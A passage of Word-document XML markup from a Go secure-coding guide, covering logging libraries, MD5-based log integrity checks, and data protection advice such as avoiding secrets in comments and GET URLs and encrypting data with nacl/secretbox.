        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Unspecified error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        logger.Print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Login error."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        fmt.Print(&amp;buf)
    }
}
</w:t>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4" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's log package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, as per the documentation, "implements </w:t>
        <w:t>simple</w:t>
        <w:t xml:space="preserve"> logging". Some common and important features are missing, such as leveled logging (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>warn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>fatal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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17"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId85" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Logrus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>https://github.com/Sirupsen/logrus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>glog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>https://github.com/golang/glog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId87" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>loggo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>https://github.com/juju/loggo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here's an important note regarding </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's log package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">: both Fatal and Panic functions do much more than logging. Panic functions call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after writing the log message. What is not generally accepted for libraries and Fatal functions call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>os.Exit(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after writing the log message that may terminate the program preventing deferred statements to run, buffers to be flushed, and/or temporary data to be removed.</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05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">{...}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Get our known Log checksum from checksum file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
logChecksum, err := ioutil.ReadFile(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"log/checksum"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
str := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(logChecksum) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// convert content to a 'string'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Compute our current log's MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
b, err := ComputeMd5(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"log/log"</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fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Err: %v"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, err)
} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
  md5Result := hex.EncodeToString(b)
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Compare our calculated hash with our stored hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> str == md5Result {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Ok the checksums match.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Log integrity OK."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// The file integrity has been compromised...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"File Tampering detected."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  }
}
{...}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>ComputeMD5()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function calculates a file's MD5. It's also important to note that the log-file hashes must be stored in a safe place, and compared with the current log hash to verify integrity before any updates to the log. Full source is included in the document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="53" w:name="Data_Protection"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Data Protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Nowadays, one of the most important things in security in general is data protection. You don't want something like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5760720" cy="3840479"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="All your data are belong to us" id="8" name="cB52MA.jpeg"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="All your data are belong to us" id="0" name="cB52MA.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3840479"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>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0"/>
        </w:rPr>
        <w:t>Sales user</w:t>
      </w:r>
      <w:r>
        <w:t>: Allowed to only view a catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Marketing user</w:t>
      </w:r>
      <w:r>
        <w:t>: Allowed to check statistics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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r:id="rId67" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Access Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="54" w:name="Remove_sensitive_information"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Remove sensitive information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Temporary and cache files which contain sensitive information should be removed as soon as they're not needed. If you still need some of them, move them to protected areas or encrypt them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="55" w:name="Comments"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>Comments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sometimes developers leave comments like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>To-do lists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the source-code, and sometimes, in the worst case scenario, developers may leave credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// Secret API endpoint - /api/mytoken?callback=myToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Just a random code"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>In the above example, the developer has an endpoint in a comment which, if not well protected, could be used by a malicious user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="56" w:name="URL"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Passing sensitive information using the HTTP GET method leaves the web application vulnerable because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Data could be intercepted if not using HTTPS by MITM attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Browser history stores the user's information. If the URL has session IDs, pins or tokens that don't expire (or have low entropy), they can be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">req, _ := http.NewRequest(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"GET"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://mycompany.com/api/mytoken?api_key=000s3cr3t000"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If your web application tries to get information from a third-party website using your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>api_key</w:t>
      </w:r>
      <w:r>
        <w:t>, it could be stolen if anyone is listening within your network. This is due to the lack of HTTPS and the parameters being passed through GET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Also, if your web application has links to the example site:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">http://mycompany.com/api/mytoken?api_key=000s3cr3t000
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>It will be stored in your browser history, so again, it can be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Solutions should always use HTTPS. Furthermore, try to pass the parameters using the POST method. And, if possible, use one-time only session IDs or tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="57" w:name="Information_is_power"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>Information is power</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>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58" w:name="Encryption_is_the_key"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>Encryption is the key</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every piece of highly-sensitive information should be encrypted in your web application. Use the military-grade </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>encryption available in Go</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. For more information, see the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index6_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Database Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section), or other sensitive information in clear text or in any non-cryptographically secure manner on the client side. This includes embedding in insecure formats (e.g. Adobe flash or compiled code).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here's a small example of encryption in Go using an external package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>golang.org/x/crypto/nacl/secretbox</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// Load your secret key from a safe place and reuse it across multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Seal calls. (Obviously don't use this example key for anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// real.) If you want to convert a passphrase to a key, use a suitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// package like bcrypt or scrypt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
secretKeyBytes, err := hex.DecodeString(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"6368616e676520746869732070617373776f726420746f206120736563726574"</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(err)
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> secretKey [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(secretKey[:], secretKeyBytes)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// You must use a different nonce for each message you encrypt with the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// same key. Since the nonce here is 192 bits long, a random value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// provides a sufficiently small probability of repeats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> nonce [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> _, err := rand.Read(nonce[:]); err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(err)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// This encrypts "hello world" and appends the result to the nonce.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
encrypted := secretbox.Seal(nonce[:], []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"hello world"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">), &amp;nonce, &amp;secretKey)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// When you decrypt, you must use the same nonce and key you used to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// encrypt the message. One way to achieve this is to store the nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// alongside the encrypted message. Above, we stored the nonce in the first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// 24 bytes of the encrypted text.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> decryptNonce [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(decryptNonce[:], encrypted[:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">])
decrypted, ok := secretbox.Open([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
